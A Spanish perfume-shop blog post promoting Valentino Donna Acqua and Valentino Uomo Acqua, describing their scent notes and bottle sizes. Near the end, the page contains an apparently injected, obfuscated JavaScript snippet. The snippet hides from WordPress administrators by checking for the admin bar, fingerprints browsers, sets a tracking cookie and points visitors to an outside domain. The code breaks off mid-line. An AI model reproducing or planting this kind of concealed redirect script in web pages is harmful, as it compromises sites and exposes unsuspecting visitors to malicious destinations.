¿Estás buscando un aroma refrescante para contrarrestar las altas temperaturas? Este verano de 2017 Valentino nos sorprende con la reinterpretación de 2 de sus fragancias: Valentino Dona y Valentino Uomo ahora más jugosos y ligeros, pero manteniendo su esencia.

Hoy en el blog de Perfumerías Tin Tin te contamos todos los detalles sobre las nuevas fragancias Valentino Donna Acqua y Valentino Uomo Acqua que marcan el inicio de una nueva era más lujosa y cool con Clement Chabernaud y Maartje Verhoef como imagen de su campaña.

Valentino Donna Acqua

Las mujeres primero. Por eso, empezamos por Valentino Dona Aqua, una fragancia que mantiene las notas de cuero y rosa, pero ahora combina tonos más dulces y amargos. Así como un corazón floral compuesto por jazmín y frangipani. ¡Un aroma que te enamorará en las noches de verano!

Disponible en su icónico envase rosa de cristal tallado con tachuelas en tamaño 30ml, 50ml y 100ml.

Valentino Uomo Acqua

Seguimos con Valentino Uomo Acqua, que en esta ocasión se viste de un gris verdoso que cambia la expresión de la belleza en el mundo de la perfumería, la armonía disonante del deseo moderno. Esta fragancia preserva su elegante aroma característico a cuero e incluye refrescantes aromas como mandarina y tomates verdes. ¡Una fragancia verdaderamente seductora y elegante para conquistar las noches de esta temporada estival!

Esta fragancia está disponible en Perfumerías Tin Tin en tamaño de 75ml y 125ml.

ADV_VALENTINO-DONNA-UOMO-ACQUA

¿Tienes ganas de más? En Perfumerías Tin Tin puedes encontrar las mejores marcas de perfumería y todas las novedades en fragancias femeninas y masculinas para refrescarte esta temporada.

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone